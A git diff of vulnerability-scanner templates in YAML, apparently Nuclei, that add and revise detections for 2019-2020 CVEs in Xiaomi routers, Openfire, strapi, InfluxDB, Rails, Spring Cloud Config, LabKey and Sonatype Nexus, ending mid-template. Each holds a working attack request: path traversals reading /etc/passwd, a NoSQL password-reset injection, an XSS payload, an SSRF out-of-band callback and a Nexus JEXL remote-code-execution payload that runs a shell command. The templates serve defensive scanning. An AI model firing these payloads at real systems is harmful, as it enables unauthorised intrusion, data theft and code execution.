matchers-condition: and
matchers:
- - type: status
- status:
- - 200
-
- type: word
part: body
words:
- '"name":"admin"'
- '"admin":true'
- condition: and
\ No newline at end of file
+ condition: and
+
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/05/16
diff --git a/poc/cve/cve-2019-18371.yaml b/poc/cve/cve-2019-18371.yaml
new file mode 100644
index 0000000000..62b60facee
--- /dev/null
+++ b/poc/cve/cve-2019-18371.yaml
@@ -0,0 +1,43 @@
+id: CVE-2019-18371
+
+info:
+ name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion
+ author: ritikchaddha
+ severity: high
+ description: |
+ Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.
+ remediation: |
+ Update the firmware of the Xiaomi Mi WiFi R3G routers to the latest version, which includes a fix for the local file inclusion vulnerability.
+ reference:
+ - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html
+ - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-18371
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2019-18371
+ cwe-id: CWE-22
+ epss-score: 0.02376
+ epss-percentile: 0.88739
+ cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: mi
+ product: millet_router_3g_firmware
+ tags: cve2019,cve,lfi,router,mi,xiaomi
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a0047304502202ceca95e0d23de7e0a57b502dd0f9cdbcb2ff6275f928581667d5d77e31bd462022100c5340466ae8dcfee1d77f4663912ab93da119436b3e23013e6b82fa1f43129ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2019-18394.yaml b/poc/cve/cve-2019-18394.yaml
index 54d75bda8f..7edc1dc808 100644
--- a/poc/cve/cve-2019-18394.yaml
+++ b/poc/cve/cve-2019-18394.yaml
@@ -1,17 +1,30 @@
id: CVE-2019-18394
info:
- name: Openfire Full Read SSRF
- author: pdteam - nuclei.projectdiscovery.io
+ name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
+ author: pdteam
severity: critical
-
- # Source:- https://swarm.ptsecurity.com/openfire-admin-console/
+ description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
+ reference:
+ - https://swarm.ptsecurity.com/openfire-admin-console/
+ - https://github.com/igniterealtime/Openfire/pull/1497
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-18394
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2019-18394
+ cwe-id: CWE-918
+ tags: cve,cve2019,ssrf,openfire,oast
requests:
- method: GET
path:
- - "{{BaseURL}}/getFavicon?host=burpcollaborator.net"
+ - "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}"
+
matchers:
- type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
words:
- - Burp Collaborator Server
\ No newline at end of file
+ - "http"
+
+# Enhanced by mp on 2022/05/03
diff --git a/poc/cve/cve-2019-18818.yaml b/poc/cve/cve-2019-18818.yaml
index 5ec5e8c48c..3e560d9c4b 100644
--- a/poc/cve/cve-2019-18818.yaml
+++ b/poc/cve/cve-2019-18818.yaml
@@ -1,17 +1,18 @@
id: CVE-2019-18818
info:
- name: strapi CMS Unauthenticated Admin Password Reset
+ name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
author: idealphase
severity: critical
- description: "strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js."
+ description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
reference:
- https://github.com/advisories/GHSA-6xc2-mj39-q599
- https://www.exploit-db.com/exploits/50239
- https://nvd.nist.gov/vuln/detail/CVE-2019-18818
+ - https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2019-18818
cwe-id: CWE-640
tags: cve,cve2019,strapi,auth-bypass,intrusive
@@ -23,7 +24,9 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
+
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
+
matchers-condition: and
matchers:
- type: status
@@ -49,4 +52,5 @@ requests:
- .user.username
- .user.email
-# Enhanced by mp on 2022/04/01
+
+# Enhanced by mp on 2022/05/03
diff --git a/poc/cve/cve-2019-19824.yaml b/poc/cve/cve-2019-19824.yaml
index 35562023ae..15cf1f3024 100644
--- a/poc/cve/cve-2019-19824.yaml
+++ b/poc/cve/cve-2019-19824.yaml
@@ -9,6 +9,7 @@ info:
- https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-19824
- https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits
+ - https://sploit.tech
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
diff --git a/poc/cve/cve-2019-20085.yaml b/poc/cve/cve-2019-20085.yaml
new file mode 100644
index 0000000000..eba6f7c080
--- /dev/null
+++ b/poc/cve/cve-2019-20085.yaml
@@ -0,0 +1,33 @@
+id: CVE-2019-20085
+
+info:
+ name: TVT NVMS 1000 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-20085
+ - https://www.exploit-db.com/exploits/48311
+ - https://www.exploit-db.com/exploits/47774
+ - http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2019-20085
+ cwe-id: CWE-22
+ tags: cve,cve2019,iot,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "\\[(font|extension|file)s\\]"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2019-20933.yaml b/poc/cve/cve-2019-20933.yaml
index fbe3c4f008..8f2e603c54 100644
--- a/poc/cve/cve-2019-20933.yaml
+++ b/poc/cve/cve-2019-20933.yaml
@@ -1,39 +1,50 @@
-id: CVE-2019-20933
-
+id: CVE-2019-20933
+
info:
- name: Authentication Bypass InfluxDB
+ name: InfluxDB <1.7.6 - Authentication Bypass
author: pussycat0x,c-sh0
severity: critical
- description: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
+ description: InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+ impact: |
+ An attacker can bypass authentication and gain unauthorized access to the InfluxDB database.
+ remediation: Update Influxdb to version 1.7.6~rc0-1 or higher.
reference:
- https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933
- - https://nvd.nist.gov/vuln/detail/CVE-2019-20933
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933
- https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6
- remediation: Update Influxdb to version 1.6.7~rc0-1 or higher.
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-20933
+ - https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-20933
cwe-id: CWE-287
+ epss-score: 0.04913
+ epss-percentile: 0.92609
+ cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:*
metadata:
- shodan-dork: InfluxDB
- verified: "true"
- tags: unauth,db,influxdb,misconfig
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '"results":'
- - '"name":"databases"'
- condition: and
-
- - type: status
- status:
- - 200
+ verified: true
+ max-request: 1
+ vendor: influxdata
+ product: influxdb
+ shodan-query: InfluxDB
+ tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"results":'
+ - '"name":"databases"'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+# digest: 4b0a00483046022100b58799e6f8127779c0e815988ea4492ea6d8636cc9b2d9a0c8b6619e4d8d6078022100e896460a50bf9af6cc431831d64f1bdb58867e720e5cf1e203c1ef4431670286:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2019-2579.yaml b/poc/cve/cve-2019-2579.yaml
index b8cc27c5e2..f54804eb17 100644
--- a/poc/cve/cve-2019-2579.yaml
+++ b/poc/cve/cve-2019-2579.yaml
@@ -1,19 +1,20 @@
id: CVE-2019-2579
info:
- name: Oracle WebCenter Sites - SQL Injection
+ name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection
author: leovalcante
severity: medium
- description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
+ description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://github.com/Leovalcante/wcs_scanner
- tags: cve,cve2019,oracle,wcs,sqli
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-2579
+ - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 4.30
+ cvss-score: 4.3
cve-id: CVE-2019-2579
-
+ tags: cve,cve2019,oracle,wcs,sqli
requests:
- raw:
@@ -48,4 +49,6 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/05/04
diff --git a/poc/cve/cve-2019-3799.yaml b/poc/cve/cve-2019-3799.yaml
new file mode 100644
index 0000000000..167e2d5f81
--- /dev/null
+++ b/poc/cve/cve-2019-3799.yaml
@@ -0,0 +1,31 @@
+id: CVE-2019-3799
+
+info:
+ name: Spring-Cloud-Config-Server Directory Traversal
+ author: madrobot
+ severity: medium
+ description: Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
+ reference:
+ - https://github.com/mpgn/CVE-2019-3799
+ - https://pivotal.io/security/cve-2019-3799
+ - https://www.oracle.com/security-alerts/cpuapr2022.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2019-3799
+ cwe-id: CWE-22
+ tags: cve,cve2019,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - 'root:.*:0:0:'
+ part: body
diff --git a/poc/cve/cve-2019-3911.yaml b/poc/cve/cve-2019-3911.yaml
new file mode 100644
index 0000000000..ba2a73a676
--- /dev/null
+++ b/poc/cve/cve-2019-3911.yaml
@@ -0,0 +1,40 @@
+id: CVE-2019-3911
+
+info:
+ name: LabKey Server < 18.3.0 - XSS
+ author: princechaddha
+ severity: medium
+ description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror
+ parameter in the /__r2/query endpoints.
+ reference:
+ - https://www.tenable.com/security/research/tra-2019-03
+ - https://www.cvedetails.com/cve/CVE-2019-3911
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2019-3911
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: 'Server: Labkey'
+ tags: cve,cve2019,xss,labkey
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2019-5418.yaml b/poc/cve/cve-2019-5418.yaml
new file mode 100644
index 0000000000..8313d1a869
--- /dev/null
+++ b/poc/cve/cve-2019-5418.yaml
@@ -0,0 +1,35 @@
+id: CVE-2019-5418
+
+info:
+ name: Rails File Content Disclosure
+ author: omarkurt
+ severity: high
+ description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
+ reference:
+ - https://github.com/omarkurt/CVE-2019-5418
+ - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-5418
+ - https://www.exploit-db.com/exploits/46585/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2019-5418
+ tags: cve,cve2019,rails,lfi,disclosure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ headers:
+ Accept: ../../../../../../../../etc/passwd{{
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+# Enhanced by mp on 2022/04/12
diff --git a/poc/cve/cve-2019-7238.yaml b/poc/cve/cve-2019-7238.yaml
new file mode 100644
index 0000000000..dcc8e406c2
--- /dev/null
+++ b/poc/cve/cve-2019-7238.yaml
@@ -0,0 +1,39 @@
+id: CVE-2019-7238
+
+info:
+ name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
+ author: pikpikcu
+ severity: critical
+ description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.
+ reference:
+ - https://github.com/jas502n/CVE-2019-7238
+ - https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-7238
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2019-7238
+ tags: cve,cve2019,nexus,rce
+
+requests:
+ - raw:
+ - |
+ POST /service/extdirect HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ X-Requested-With: XMLHttpRequest
+
+ {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/03
diff --git a/poc/cve/cve-2019-8449.yaml b/poc/cve/cve-2019-8449.yaml
index 901f583d18..fbc411d863 100644
--- a/poc/cve/cve-2019-8449.yaml
+++ b/poc/cve/cve-2019-8449.yaml
@@ -2,10 +2,19 @@ id: CVE-2019-8449
info:
name: JIRA Unauthenticated Sensitive Information Disclosure
- author: Harsh Bothra
+ author: harshbothra_
severity: medium
-
-# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
+ description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
+ reference:
+ - https://www.doyler.net/security-not-included/more-jira-enumeration
+ - https://jira.atlassian.com/browse/JRASERVER-69796
+ - http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2019-8449
+ cwe-id: CWE-306
+ tags: cve,cve2019,atlassian,jira,disclosure
requests:
- method: GET
diff --git a/poc/cve/cve-2019-8982.yaml b/poc/cve/cve-2019-8982.yaml
index dfa59f24c3..abd568261b 100644
--- a/poc/cve/cve-2019-8982.yaml
+++ b/poc/cve/cve-2019-8982.yaml
@@ -1,8 +1,19 @@
id: CVE-2019-8982
+
info:
- name: Wavemaker Studio 6.6 LFI/SSRF
+ name: Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery
author: madrobot
- severity: high
+ severity: critical
+ description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery."
+ reference:
+ - https://www.exploit-db.com/exploits/45158
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-8982
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
+ cvss-score: 9.6
+ cve-id: CVE-2019-8982
+ cwe-id: CWE-918
+ tags: cve,cve2019,wavemaker,lfi,ssrf
requests:
- method: GET
@@ -15,5 +26,8 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
+
+
+# Enhanced by mp on 2022/05/03
diff --git a/poc/cve/cve-2019-9922.yaml b/poc/cve/cve-2019-9922.yaml
index 9860c82699..caff895c05 100644
--- a/poc/cve/cve-2019-9922.yaml
+++ b/poc/cve/cve-2019-9922.yaml
@@ -1,27 +1,40 @@
id: CVE-2019-9922
+
info:
- name: JE Messenger 1.2.2 Joomla - Directory Traversal
+ name: Joomla! Harmis Messenger 1.2.2 - Local File Inclusion
author: 0x_Akoko
severity: high
- description: An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla. Directory Traversal allows read access to arbitrary files.
+ description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files.
+ impact: |
+ Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! application.
+ remediation: |
+ Update to the latest version of Harmis Messenger (1.2.3) or apply the patch provided by the vendor to fix the LFI vulnerability.
reference:
- https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md
- - https://www.cvedetails.com/cve/CVE-2019-9922
+ - https://extensions.joomla.org/extension/je-messenger/
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-9922
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-9922
cwe-id: CWE-22
- tags: cve,cve2019,joomla,messenger,lfi
+ epss-score: 0.01171
+ epss-percentile: 0.83428
+ cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:*
+ metadata:
+ max-request: 1
+ vendor: harmistechnology
+ product: je_messenger
+ framework: joomla\!
+ tags: cve2019,cve,joomla,messenger,lfi,harmistechnology,joomla\!
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"
matchers-condition: and
matchers:
-
- type: regex
regex:
- "root:[x*]:0:0"
@@ -29,3 +42,4 @@ requests:
- type: status
status:
- 200
+# digest: 4a0a00473045022025eb2b749f69315baa135f24019ef15db3c396a62f1595cbb6af53dc14d7aae8022100cde31cfbe066dad7ce440cdc4f4ee06dc3da7c57a7185cf726aaf72c7d6149a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-0618.yaml b/poc/cve/cve-2020-0618.yaml
index b123e8720c..db74d9daff 100644
--- a/poc/cve/cve-2020-0618.yaml
+++ b/poc/cve/cve-2020-0618.yaml
@@ -1,28 +1,47 @@
id: CVE-2020-0618
info:
- name: RCE in SQL Server Reporting Services
+ name: Microsoft SQL Server Reporting Services - Remote Code Execution
author: joeldeleep
severity: high
+ description: Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
+ remediation: |
+ Apply the latest security updates provided by Microsoft to mitigate this vulnerability.
+ reference:
